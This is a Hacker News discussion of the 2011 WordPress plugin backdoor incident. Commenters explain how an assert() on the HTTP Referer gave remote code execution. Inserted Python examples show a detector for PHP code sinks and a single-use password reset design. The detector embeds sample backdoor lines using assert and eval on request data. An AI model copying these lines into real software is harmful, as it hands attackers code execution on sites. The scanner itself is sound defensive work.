Passwords Reset (Wordpress Plugins Hacked) - telemachos
http://wordpress.org/news/2011/06/passwords-reset/

======
ck2
This is the timeline I see from when it happened?

[http://plugins.trac.wordpress.org/timeline?from=06%2F21%2F11...](http://plugins.trac.wordpress.org/timeline?from=06%2F21%2F11&daysback=1&authors=&changeset=on&update=Update)

<http://pastebin.com/raw.php?i=G06rbb5a>

Actually, maybe that is the reversion log, yeah it is.

Trying to find what they did:

[http://plugins.trac.wordpress.org/changeset?old_path=%2Fw3-t...](http://plugins.trac.wordpress.org/changeset?old_path=%2Fw3-total-cache&old=399592&new_path=%2Fw3-total-cache&new=390000)

~~~
qixxiq
The diff is at:
[http://plugins.trac.wordpress.org/changeset?reponame=&ol...](http://plugins.trac.wordpress.org/changeset?reponame=&old=399310%40addthis&new=395689%40addthis)

PHP's assert function ridiculously runs eval() on the code too, so to use
their backdoor they just include code as their HTTP_REFERER.

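The backdoor shape qixxiq describes, an assert() handing a request-controlled string to the interpreter, is easy to miss in a large plugin diff but easy to scan for. The following is an added example written for this page, not code from the thread or from any WordPress plugin: it walks PHP source line by line and reports code sinks whose argument mentions a client-controlled superglobal. The plugin source it scans is constructed for the demo and its wpdemo_* names are made up.

```python
import re

# Functions that evaluate a string argument as PHP code. assert() did so for
# string arguments in PHP 5.x (string assertions were removed in PHP 8), which
# is what turns assert($_SERVER['HTTP_REFERER']) into remote code execution.
CODE_SINKS = ("assert", "eval", "create_function")

# Superglobals an unauthenticated HTTP client controls, fully or in part.
REQUEST_SOURCES = ("$_GET", "$_POST", "$_COOKIE", "$_REQUEST", "$_SERVER")

SINK_RE = re.compile(r"\b(" + "|".join(CODE_SINKS) + r")\s*\(", re.IGNORECASE)

# Constructed sample: a harmless-looking plugin with a planted backdoor.
# Not real code from the repository; the wpdemo_* names are invented.
SAMPLE_PLUGIN = r"""<?php
/* Constructed sample plugin for the scanner demo. */
function wpdemo_register() {
    assert(is_array($GLOBALS['wp_filter']));          // legitimate sanity check
    add_action('init', 'wpdemo_init');
}
function wpdemo_init() {
    // Backdoor: whatever the client sends as Referer is run as PHP.
    assert(stripslashes($_SERVER['HTTP_REFERER']));
    $q = $_GET['q'];                                   // input, but no code sink
    eval(base64_decode($_COOKIE['wp_c']));             // same idea, different sink
}
"""


def _call_argument(line, start):
    """Return the text between the parentheses of the call whose name starts
    at `start`, tracking nesting so wrappers like stripslashes(...) stay in."""
    open_at = line.index("(", start)
    depth = 0
    for i in range(open_at, len(line)):
        if line[i] == "(":
            depth += 1
        elif line[i] == ")":
            depth -= 1
            if depth == 0:
                return line[open_at + 1:i]
    return line[open_at + 1:]  # unbalanced on this line; take what we have


def scan_php(source):
    """Return (line_number, sink, superglobal) for every call to a code sink
    whose argument expression mentions a request-controlled superglobal."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        # Drop trailing // comments (simplification: a '//' inside a string
        # literal on the same line would also be cut).
        code = line.split("//", 1)[0]
        for m in SINK_RE.finditer(code):
            arg = _call_argument(code, m.start())
            for src in REQUEST_SOURCES:
                if src in arg:
                    findings.append((lineno, m.group(1).lower(), src))
                    break
    return findings


if __name__ == "__main__":
    for lineno, sink, src in scan_php(SAMPLE_PLUGIN):
        print(f"line {lineno}: {sink}() evaluates data from {src}")
```

The check keys on the combination of sink and superglobal rather than on assert() alone, since a plugin may legitimately assert on internal state; wrappers such as stripslashes() or base64_decode() around the input do not hide it. Treat a scanner like this as triage, not proof of absence: a backdoor built from variable function names or string concatenation needs a manual read of the actual changesets linked in the thread.
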
~~~
PleaseStand
The backdoors in the two other plugins mentioned:

<http://plugins.trac.wordpress.org/changeset/399276>

<http://plugins.trac.wordpress.org/changeset/399286>

------
ck2
Maybe someone gained svn root? <http://svn.wp-plugins.org/>

The problem is while WordPress has evolved to a secure way of not storing
passwords but instead the salted hash, new passwords (and resets) are still
sent in the clear via very insecure, plain text email, and probably archived
forever on some services like gmail, hotmail, yahoo, etc.

~~~
dd32
I can't comment on how the accounts were compromised (as I'm not part of those
investigating); however, I'm pretty sure I can say it's the accounts that were
compromised (as the commits came from the plugin owners' accounts) and not the
svn server or svn root.

It looks like certain accounts were compromised. How? I don't know. It could
be anything from the users having weak passwords to an MITM attack/sniffing
(unsecured wireless, anyone? I bet most of these authors have been to a
WordCamp or two). But like I said, I don't know how; that's pure speculation.

WordPress.org (and the WordPress software itself) has not sent passwords in
emails for a while now, except in cases where it's absolutely required.

When a user forgets their password, an email with a single-use URL is sent;
that link allows them to change their password. Yes, if their email is
compromised, their account can be compromised.

When a user changes their password, it is not sent via email to the account
owner or site administrator.

When a new install is created, if the user enters a password during the
installation process, their password will not be sent via email. If they leave
it at the default randomly generated password, it WILL be emailed to them, and
they'll be asked to change it upon next login; they're expected to change it
when they log in.

If a new user is added to a WordPress installation, and the admin sets a
password, they can choose to send an email to the user with their details.

It's all about weighing usability vs. security against each other; the cases
where WordPress Core sends emails that include a password are very minimal
(and only in cases where it's actually required).

Some people choose to disable the password reset process entirely on their
installations; if you have server access, or a decent amount of knowledge,
it's often an unneeded component.

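dd32's reset flow (a mailed single-use link rather than a mailed password) and ck2's point that only a salted hash of the password should be stored fit together in a few dozen lines. The following is an added illustration written for this page, not WordPress's own implementation: the dicts stand in for database tables, the base URL and the one-hour link lifetime are assumed values, and PBKDF2 is used simply as a readily available salted, iterated hash.

```python
import hashlib
import hmac
import secrets
import time
from urllib.parse import parse_qs, urlparse

TOKEN_TTL = 3600  # seconds a reset link stays valid (assumed value)
BASE_URL = "https://example.invalid/wp-login.php?action=rp"  # made-up address
PBKDF2_ROUNDS = 100_000

_users = {}   # login -> {"salt": bytes, "hash": bytes}; stands in for a table
_resets = {}  # sha256(token) -> {"login": str, "expires": float}


def _hash_password(password, salt):
    """Salted, iterated hash; the clear-text password is never stored."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def set_password(login, password):
    salt = secrets.token_bytes(16)  # per-user salt defeats precomputed tables
    _users[login] = {"salt": salt, "hash": _hash_password(password, salt)}


def check_password(login, password):
    rec = _users.get(login)
    if rec is None:
        return False
    return hmac.compare_digest(rec["hash"], _hash_password(password, rec["salt"]))


def _token_key(token):
    # Only a hash of the token is kept, so a copy of the reset table cannot
    # be turned into working links.
    return hashlib.sha256(token.encode()).digest()


def request_reset(login, now=None):
    """Mint a single-use link for `login`, or None for an unknown account
    (the caller should still answer "e-mail sent" to avoid user enumeration)."""
    if login not in _users:
        return None
    now = time.time() if now is None else now
    # A new request invalidates any earlier outstanding link for this user.
    for key in [k for k, v in _resets.items() if v["login"] == login]:
        del _resets[key]
    token = secrets.token_urlsafe(32)
    _resets[_token_key(token)] = {"login": login, "expires": now + TOKEN_TTL}
    return f"{BASE_URL}&login={login}&key={token}"


def token_from_link(link):
    """Pull the key parameter back out of a mailed link."""
    return parse_qs(urlparse(link).query)["key"][0]


def consume_reset(token, new_password, now=None):
    """Redeem a link exactly once; unknown, expired or reused tokens fail.
    The record is popped before the expiry check, so an expired token is
    removed as well rather than lingering in the table."""
    now = time.time() if now is None else now
    rec = _resets.pop(_token_key(token), None)
    if rec is None or rec["expires"] < now:
        return False
    set_password(rec["login"], new_password)
    return True


if __name__ == "__main__":
    set_password("alice", "correct horse battery staple")
    link = request_reset("alice")
    print("mailed link:", link)
    tok = token_from_link(link)
    print("first use ok:", consume_reset(tok, "new password"))
    print("second use ok:", consume_reset(tok, "another password"))
```

The mailed link is the only secret that ever transits e-mail, and it is worthless after one use or after TOKEN_TTL seconds; this is exactly why an attacker who reads the user's mailbox can still reset the account (dd32's caveat) but an attacker who only reads an old mail archive, or a dump of the reset table, cannot.
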
~~~
noobiscus
"It looks like certain accounts were compromised, how? I don't know, "

Maybe they all had Playstations?

------
IgorPartola
It seems it is time to do away with password authentication and start thinking
in terms of pubkeys. I recently disallowed all password logins via SSH for all
the machines where I can do this. Next, I am looking into authenticating sudo
via ssh-agent through PAM (seems the code to do this is not available in
standard Ubuntu repos).

If only more places were OpenID enabled, there would be fewer passwords to
protect for the web.

~~~
ck2
Hmm, so what happens when your OpenID password or provider gets hacked?

~~~
IgorPartola
I currently run my own OpenID end point and once anything but HN and Stack
Overflow starts supporting it I will probably add two form auth and use
client-side certificates for authenticating with it. Also Google supports two
factor auth now and they are an OpenID provider too.

